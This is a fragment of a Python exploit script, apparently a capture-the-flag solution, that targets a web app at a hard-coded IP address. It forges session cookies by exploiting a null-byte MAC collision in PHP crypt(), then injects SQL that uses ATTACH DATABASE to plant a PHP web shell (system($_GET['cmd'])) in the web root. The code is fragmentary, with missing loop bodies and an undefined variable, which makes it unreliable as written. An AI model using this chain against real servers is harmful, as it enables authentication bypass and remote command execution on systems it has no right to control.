URL = "http://65.108.176.96:8888/"
Find an instance where two IDs produce '\x00' at the beginning of the hash_hmac() output,
so that crypt(), which is not a binary-safe function, returns the same value for both.
Returns the MAC that corresponds to this result.
# NOTE(review): `r` is a response object produced outside this fragment — confirm against the caller.
# The session cookie is expected to be URL-encoded "<id>|<mac>"; only the value part is kept.
cookie = r.headers['Set-Cookie'].split('=')[1]
cookie = urllib.parse.unquote(cookie)
# NOTE(review): `id` shadows the builtin of the same name; left as-is because later code may read it.
id, mac = cookie.split('|')
def find_exploit_collision(exploit, mac):
Finds a collision with the exploit user ID string. Appends characters to the end of the string until
the hash_hmac() output begins with '\x00'.
exploit = urllib.parse.quote_plus(exploit).replace('+', ' ')
# Test if the hash_hmac() output begins with '\x00' (if it does, then the MAC is valid)
r = requests.get(URL, cookies={'session': tmp + '|' + mac})
if "My shitty Blog" in r.text:
# Hard-coded MAC; where it was obtained is not shown in this fragment — presumably a prior run.
mac = "QAhL.MoHxwRM3Bt/pMvSrjxnRCAxaim7VAtMVwCnNgsjtlWO3AKBcd1WY9NYPrxtUrTluTorPK4laJKcJydWB0"
print(f"Found MAC: {mac}")
# Search for an id string that the server accepts together with the fixed MAC above.
exploit = find_exploit_collision("20 or 1=1; ATTACH DATABASE '/var/www/html/data/nice.php' AS lol; CREATE TABLE lol.pwn (dataz text); INSERT INTO lol.pwn (dataz) VALUES ('<?php system($_GET[\"cmd\"]); ?>');#", mac)
print(f"Found exploit: {exploit}")
# Cookie format mirrors the "<id>|<mac>" layout parsed earlier in the file.
print(f"Set session cookie: {exploit}|{mac}")